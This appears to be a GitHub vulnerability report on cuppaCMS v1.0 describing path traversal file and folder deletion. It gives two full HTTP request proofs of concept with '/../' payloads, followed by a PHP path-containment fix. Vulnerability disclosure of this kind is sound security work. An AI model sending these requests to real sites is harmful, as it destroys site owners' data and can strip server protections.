Multiple Unauthorized Arbitrary File Deletion vulnerabilities #23

liangyueliangyue opened this issue Feb 5, 2022 · 0 comments

liangyueliangyue commented Feb 5, 2022

Vulnerability Name: Multiple Arbitrary File Deletion

Date of Discovery: 06 Feb 2022

Product version: cuppaCMS v1.0 (Download link)

Author: lyy

Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of, or the whole of, the affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms, such as deleting the .htaccess file, which would deactivate those security constraints.

Proof of Concept 1

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: lines 116 and 118 - cuppacms/js/filemanager/api/FileManager.php

Steps to Reproduce:
1. Send the request directly through Burp

POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/../test.php","action":"deleteFile"}

2. You can traverse the directory to delete any file.

Proof of Concept 2

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: lines 124 and 138 - cuppacms/js/filemanager/api/FileManager.php

Steps to Reproduce:
1. Send the request directly through Burp

POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/../1","action":"deleteFolder"}

2. You can traverse directories and delete them; deleting a directory also deletes all files inside it, so this achieves the effect of deleting any file.
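The root cause in both proofs of concept is that the `path` value is joined to the file manager's root and passed to the deletion call without confining the resolved result to that root. The following is an added, defender-side example of such a containment check (it is not CuppaCMS code and does not reflect how FileManager.php is written); the function names and the temporary-directory demo layout are assumptions. The same check applies before a folder deletion.

```php
<?php
// Added, defender-side example; not CuppaCMS code. Names and demo layout are assumptions.
// Resolve a user-supplied path against $baseDir and return the canonical
// path only if it stays inside $baseDir; otherwise return null.
function resolveInsideBase(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($userPath, "\0") !== false) {
        return null;                      // base missing, or NUL byte in input
    }
    // Treat the input as relative to the base: "/../test.php" -> "../test.php".
    $relative = ltrim($userPath, "/\\");
    if ($relative === '') {
        return null;                      // never let "/" or "" mean the base itself
    }
    // realpath() resolves "..", symlinks and duplicate separators on the real filesystem.
    $target = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($target === false) {
        return null;                      // nothing there; no traversal hint leaks either
    }
    // Require a proper descendant. The trailing separator stops "/srv/files2"
    // from passing as a child of "/srv/files".
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Delete a regular file only when it resolves inside the managed directory.
function deleteFileSafely(string $baseDir, string $userPath): bool
{
    $target = resolveInsideBase($baseDir, $userPath);
    if ($target === null || !is_file($target)) {
        return false;                     // outside the base, or not a regular file
    }
    return unlink($target);
}

// Constructed demo: a managed directory with one file, plus a file outside it.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fm_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'inner.txt', 'inside');
$outside = $base . '_outside.txt';
file_put_contents($outside, 'outside');
$escape = '/../' . basename($outside);   // same shape as the reported "/../test.php"
printf("traversal attempt deleted outside file: %s\n", var_export(deleteFileSafely($base, $escape), true));
printf("in-base delete succeeded: %s\n", var_export(deleteFileSafely($base, 'inner.txt'), true));
printf("outside file still present: %s\n", var_export(file_exists($outside), true));
unlink($outside); rmdir($base);
```

Because the check uses realpath() on the joined path, it also rejects symlinks that point outside the base, which a string-only ".." filter would miss.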
